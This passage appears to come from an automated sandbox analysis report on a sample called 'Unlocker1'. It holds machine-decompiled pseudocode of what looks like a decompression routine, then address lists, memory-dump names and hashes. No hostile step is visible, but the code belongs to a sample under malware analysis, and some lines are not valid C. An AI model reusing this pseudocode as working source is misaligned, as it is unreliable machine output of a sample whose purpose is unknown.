                                                                                                                                                              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                              														_t391 = __ebp - 0x2c;
                                                                                                                                                              														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                              														__eflags =  *_t391;
                                                                                                                                                              														goto L119;
                                                                                                                                                              													}
                                                                                                                                                              													__eax =  *(__ebp - 0x50);
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                              													__esi = __edi + __eax;
                                                                                                                                                              													 *(__ebp - 0x54) = __esi;
                                                                                                                                                              													__ax =  *__esi;
                                                                                                                                                              													__ecx = __ax & 0x0000ffff;
                                                                                                                                                              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                              													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                              														__ecx = 0;
                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                              														__ecx = 1;
                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              														__ebx = 1;
                                                                                                                                                              														__ecx =  *(__ebp - 0x48);
                                                                                                                                                              														__ebx = 1 << __cl;
                                                                                                                                                              														__ecx = 1 << __cl;
                                                                                                                                                              														__ebx =  *(__ebp - 0x44);
                                                                                                                                                              														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                              														__cx = __ax;
                                                                                                                                                              														__cx = __ax >> 5;
                                                                                                                                                              														__eax = __eax - __ecx;
                                                                                                                                                              														__edi = __edi + 1;
                                                                                                                                                              														__eflags = __edi;
                                                                                                                                                              														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              														 *__esi = __ax;
                                                                                                                                                              														 *(__ebp - 0x50) = __edi;
                                                                                                                                                              													} else {
                                                                                                                                                              														 *(__ebp - 0x10) = __edx;
                                                                                                                                                              														0x800 = 0x800 - __ecx;
                                                                                                                                                              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              														 *__esi = __dx;
                                                                                                                                                              													}
                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              														L111:
                                                                                                                                                              														_t368 = __ebp - 0x48;
                                                                                                                                                              														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                              														__eflags =  *_t368;
                                                                                                                                                              														goto L112;
                                                                                                                                                              													} else {
                                                                                                                                                              														goto L109;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0xc);
                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                              													__ecx =  *(__ebp - 0x10);
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              													__ebx = __ebx | 0x00000001;
                                                                                                                                                              													__eflags = __ebx;
                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													L101:
                                                                                                                                                              													_t338 = __ebp - 0x48;
                                                                                                                                                              													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              													__eflags =  *_t338;
                                                                                                                                                              													goto L102;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L99;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											__edx =  *(__ebp - 4);
                                                                                                                                                              											__eax = __eax - __ebx;
                                                                                                                                                              											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                              											goto L108;
                                                                                                                                                              										case 0x1a:
                                                                                                                                                              											L56:
                                                                                                                                                              											__eflags =  *(__ebp - 0x64);
                                                                                                                                                              											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x68);
                                                                                                                                                              											__al =  *(__ebp - 0x5c);
                                                                                                                                                              											__edx =  *(__ebp - 8);
                                                                                                                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                              											__ecx =  *(__ebp - 0x14);
                                                                                                                                                              											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                              											__eax = __ecx + 1;
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              											__edx = _t192;
                                                                                                                                                              											goto L79;
                                                                                                                                                              										case 0x1b:
                                                                                                                                                              											L75:
                                                                                                                                                              											__eflags =  *(__ebp - 0x64);
                                                                                                                                                              											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 0x14);
                                                                                                                                                              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              											}
                                                                                                                                                              											__edx =  *(__ebp - 8);
                                                                                                                                                              											__cl =  *(__eax + __edx);
                                                                                                                                                              											__eax =  *(__ebp - 0x14);
                                                                                                                                                              											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              											 *(__eax + __edx) = __cl;
                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              											__edx = _t274;
                                                                                                                                                              											__eax =  *(__ebp - 0x68);
                                                                                                                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              											_t283 = __ebp - 0x64;
                                                                                                                                                              											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                              											__eflags =  *_t283;
                                                                                                                                                              											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              											L79:
                                                                                                                                                              											 *(__ebp - 0x14) = __edx;
                                                                                                                                                              											goto L80;
                                                                                                                                                              										case 0x1c:
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L123:
                                                                                                                                                              												__eflags =  *(__ebp - 0x64);
                                                                                                                                                              												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              													break;
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              												}
                                                                                                                                                              												__edx =  *(__ebp - 8);
                                                                                                                                                              												__cl =  *(__eax + __edx);
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                              												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              												 *(__eax + __edx) = __cl;
                                                                                                                                                              												__eax = __eax + 1;
                                                                                                                                                              												__edx = 0;
                                                                                                                                                              												_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              												__edx = _t414;
                                                                                                                                                              												__eax =  *(__ebp - 0x68);
                                                                                                                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                              												__eflags =  *(__ebp - 0x30);
                                                                                                                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              												 *(__ebp - 0x14) = _t414;
                                                                                                                                                              												if( *(__ebp - 0x30) > 0) {
                                                                                                                                                              													continue;
                                                                                                                                                              												} else {
                                                                                                                                                              													L80:
                                                                                                                                                              													 *(__ebp - 0x88) = 2;
                                                                                                                                                              													goto L1;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                              											goto L170;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								L171:
                                                                                                                                                              								_t535 = _t534 | 0xffffffff;
                                                                                                                                                              								goto L172;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}













                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040663a
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x00406663
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406665
                                                                                                                                                              0x00406669
                                                                                                                                                              0x00406818
                                                                                                                                                              0x0040682e
                                                                                                                                                              0x00406836
                                                                                                                                                              0x0040683d
                                                                                                                                                              0x0040683f
                                                                                                                                                              0x00406846
                                                                                                                                                              0x0040684a
                                                                                                                                                              0x0040684a
                                                                                                                                                              0x00406675
                                                                                                                                                              0x0040667c
                                                                                                                                                              0x00406684
                                                                                                                                                              0x00406687
                                                                                                                                                              0x0040668a
                                                                                                                                                              0x0040668a
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00405e2c
                                                                                                                                                              0x00405e2c
                                                                                                                                                              0x00405e2c
                                                                                                                                                              0x00405e35
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e46
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e4f
                                                                                                                                                              0x00405e52
                                                                                                                                                              0x00405e55
                                                                                                                                                              0x00405e59
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e5f
                                                                                                                                                              0x00405e62
                                                                                                                                                              0x00405e64
                                                                                                                                                              0x00405e65
                                                                                                                                                              0x00405e68
                                                                                                                                                              0x00405e6a
                                                                                                                                                              0x00405e6b
                                                                                                                                                              0x00405e6d
                                                                                                                                                              0x00405e70
                                                                                                                                                              0x00405e75
                                                                                                                                                              0x00405e7a
                                                                                                                                                              0x00405e83
                                                                                                                                                              0x00405e96
                                                                                                                                                              0x00405e99
                                                                                                                                                              0x00405ea5
                                                                                                                                                              0x00405ecd
                                                                                                                                                              0x00405ecf
                                                                                                                                                              0x00405edd
                                                                                                                                                              0x00405edd
                                                                                                                                                              0x00405ee1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405ed4
                                                                                                                                                              0x00405ed5
                                                                                                                                                              0x00405ed5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405eab
                                                                                                                                                              0x00405eb0
                                                                                                                                                              0x00405eb0
                                                                                                                                                              0x00405eb9
                                                                                                                                                              0x00405ec1
                                                                                                                                                              0x00405ec4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ee7
                                                                                                                                                              0x00405ee7
                                                                                                                                                              0x00405eeb
                                                                                                                                                              0x00406797
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406797
                                                                                                                                                              0x00405ef4
                                                                                                                                                              0x00405f04
                                                                                                                                                              0x00405f07
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0d
                                                                                                                                                              0x00405f11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f13
                                                                                                                                                              0x00405f19
                                                                                                                                                              0x00405f43
                                                                                                                                                              0x00405f49
                                                                                                                                                              0x00405f50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f50
                                                                                                                                                              0x00405f1f
                                                                                                                                                              0x00405f22
                                                                                                                                                              0x00405f27
                                                                                                                                                              0x00405f27
                                                                                                                                                              0x00405f32
                                                                                                                                                              0x00405f3a
                                                                                                                                                              0x00405f3d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f82
                                                                                                                                                              0x00405f88
                                                                                                                                                              0x00405f8b
                                                                                                                                                              0x00405f98
                                                                                                                                                              0x00405fa0
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f57
                                                                                                                                                              0x00405f57
                                                                                                                                                              0x00405f5b
                                                                                                                                                              0x004067a6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067a6
                                                                                                                                                              0x00405f67
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f75
                                                                                                                                                              0x00405f78
                                                                                                                                                              0x00405f7b
                                                                                                                                                              0x00405f80
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406617
                                                                                                                                                              0x0040661d
                                                                                                                                                              0x00406623
                                                                                                                                                              0x00406629
                                                                                                                                                              0x00406643
                                                                                                                                                              0x00406646
                                                                                                                                                              0x0040664c
                                                                                                                                                              0x00406657
                                                                                                                                                              0x00406659
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040663a
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x00406663
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060e2
                                                                                                                                                              0x004060ae
                                                                                                                                                              0x004060ae
                                                                                                                                                              0x004060b2
                                                                                                                                                              0x004060ba
                                                                                                                                                              0x004060bf
                                                                                                                                                              0x004060c1
                                                                                                                                                              0x004060c3
                                                                                                                                                              0x004060c3
                                                                                                                                                              0x004060e5
                                                                                                                                                              0x004060ec
                                                                                                                                                              0x004060ef
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060fa
                                                                                                                                                              0x004060fa
                                                                                                                                                              0x004060fe
                                                                                                                                                              0x004067be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067be
                                                                                                                                                              0x00406104
                                                                                                                                                              0x00406107
                                                                                                                                                              0x0040610a
                                                                                                                                                              0x0040610e
                                                                                                                                                              0x00406111
                                                                                                                                                              0x00406117
                                                                                                                                                              0x00406119
                                                                                                                                                              0x00406119
                                                                                                                                                              0x00406119
                                                                                                                                                              0x0040611c
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x00406125
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406127
                                                                                                                                                              0x0040612a
                                                                                                                                                              0x0040612d
                                                                                                                                                              0x00406130
                                                                                                                                                              0x00406133
                                                                                                                                                              0x00406136
                                                                                                                                                              0x00406139
                                                                                                                                                              0x0040613c
                                                                                                                                                              0x0040613f
                                                                                                                                                              0x00406142
                                                                                                                                                              0x00406145
                                                                                                                                                              0x0040615d
                                                                                                                                                              0x00406160
                                                                                                                                                              0x00406163
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406169
                                                                                                                                                              0x0040616d
                                                                                                                                                              0x0040616f
                                                                                                                                                              0x00406147
                                                                                                                                                              0x00406147
                                                                                                                                                              0x0040614f
                                                                                                                                                              0x00406154
                                                                                                                                                              0x00406156
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406172
                                                                                                                                                              0x00406179
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061c2
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x004061c8
                                                                                                                                                              0x004061cb
                                                                                                                                                              0x004061ce
                                                                                                                                                              0x004061d2
                                                                                                                                                              0x004061d5
                                                                                                                                                              0x004061db
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061e0
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e9
                                                                                                                                                              0x00406187
                                                                                                                                                              0x00406187
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061ee
                                                                                                                                                              0x004061f1
                                                                                                                                                              0x004061f4
                                                                                                                                                              0x004061f7
                                                                                                                                                              0x004061fa
                                                                                                                                                              0x004061fd
                                                                                                                                                              0x00406200
                                                                                                                                                              0x00406203
                                                                                                                                                              0x00406206
                                                                                                                                                              0x00406209
                                                                                                                                                              0x00406221
                                                                                                                                                              0x00406224
                                                                                                                                                              0x00406227
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622d
                                                                                                                                                              0x00406231
                                                                                                                                                              0x00406233
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x00406213
                                                                                                                                                              0x00406218
                                                                                                                                                              0x0040621a
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x00406236
                                                                                                                                                              0x0040623d
                                                                                                                                                              0x00406240
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064d3
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x004064d9
                                                                                                                                                              0x004064dc
                                                                                                                                                              0x004064df
                                                                                                                                                              0x004064e3
                                                                                                                                                              0x004064e6
                                                                                                                                                              0x004064ec
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x004062a2
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065de
                                                                                                                                                              0x004065e2
                                                                                                                                                              0x00406542
                                                                                                                                                              0x00406544
                                                                                                                                                              0x00406547
                                                                                                                                                              0x00406549
                                                                                                                                                              0x0040654b
                                                                                                                                                              0x0040654e
                                                                                                                                                              0x00406550
                                                                                                                                                              0x00406553
                                                                                                                                                              0x00406557
                                                                                                                                                              0x00406559
                                                                                                                                                              0x00406559
                                                                                                                                                              0x0040655a
                                                                                                                                                              0x0040655d
                                                                                                                                                              0x00406560
                                                                                                                                                              0x00406522
                                                                                                                                                              0x00406522
                                                                                                                                                              0x0040652a
                                                                                                                                                              0x0040652f
                                                                                                                                                              0x00406531
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406563
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x0040647d
                                                                                                                                                              0x00406480
                                                                                                                                                              0x00406482
                                                                                                                                                              0x00406485
                                                                                                                                                              0x00406488
                                                                                                                                                              0x0040648b
                                                                                                                                                              0x0040648d
                                                                                                                                                              0x00406490
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406499
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406426
                                                                                                                                                              0x00406429
                                                                                                                                                              0x0040642b
                                                                                                                                                              0x0040642e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x00406191
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00406197
                                                                                                                                                              0x0040619a
                                                                                                                                                              0x0040619d
                                                                                                                                                              0x004061a0
                                                                                                                                                              0x004061a3
                                                                                                                                                              0x004061a6
                                                                                                                                                              0x004061a9
                                                                                                                                                              0x004061ab
                                                                                                                                                              0x004061ae
                                                                                                                                                              0x004061b1
                                                                                                                                                              0x004061b4
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406318
                                                                                                                                                              0x00406318
                                                                                                                                                              0x0040631c
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00406322
                                                                                                                                                              0x00406325
                                                                                                                                                              0x00406328
                                                                                                                                                              0x0040632b
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x00406330
                                                                                                                                                              0x00406333
                                                                                                                                                              0x00406336
                                                                                                                                                              0x00406339
                                                                                                                                                              0x0040633c
                                                                                                                                                              0x0040633f
                                                                                                                                                              0x00406340
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406345
                                                                                                                                                              0x00406348
                                                                                                                                                              0x0040634b
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x00406351
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406356
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406614

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                                                                                                                                              • Instruction ID: f7c6f07f586ed293a1c67bf574783cb577a0acbc2814a7f5ecfd539a56c9ebac
                                                                                                                                                              • Opcode Fuzzy Hash: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                                                                                                                                              • Instruction Fuzzy Hash: AF715671D00229CBDF28CF98C844BADBBB1FF44305F15816AD816BB281C7785A46DF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 59%
                                                                                                                                                              			E00401B06(void* __ebx, void* __edx) {
                                                                                                                                                              				intOrPtr _t7;
                                                                                                                                                              				void* _t8;
                                                                                                                                                              				void _t11;
                                                                                                                                                              				void* _t13;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              				void* _t33;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				void* _t37;
                                                                                                                                                              
                                                                                                                                                              				_t27 = __ebx;
                                                                                                                                                              				_t7 =  *((intOrPtr*)(_t37 - 0x1c));
                                                                                                                                                              				_t30 =  *0x40af50; // 0x0
                                                                                                                                                              				if(_t7 == __ebx) {
                                                                                                                                                              					if(__edx == __ebx) {
                                                                                                                                                              						_t8 = GlobalAlloc(0x40, 0x404); // executed
                                                                                                                                                              						_t34 = _t8;
                                                                                                                                                              						_t4 = _t34 + 4; // 0x4
                                                                                                                                                              						E004059FF(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x24)));
                                                                                                                                                              						_t11 =  *0x40af50; // 0x0
                                                                                                                                                              						 *_t34 = _t11;
                                                                                                                                                              						 *0x40af50 = _t34;
                                                                                                                                                              					} else {
                                                                                                                                                              						if(_t30 == __ebx) {
                                                                                                                                                              							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t2 = _t30 + 4; // 0x4
                                                                                                                                                              							E004059DD(_t33, _t2);
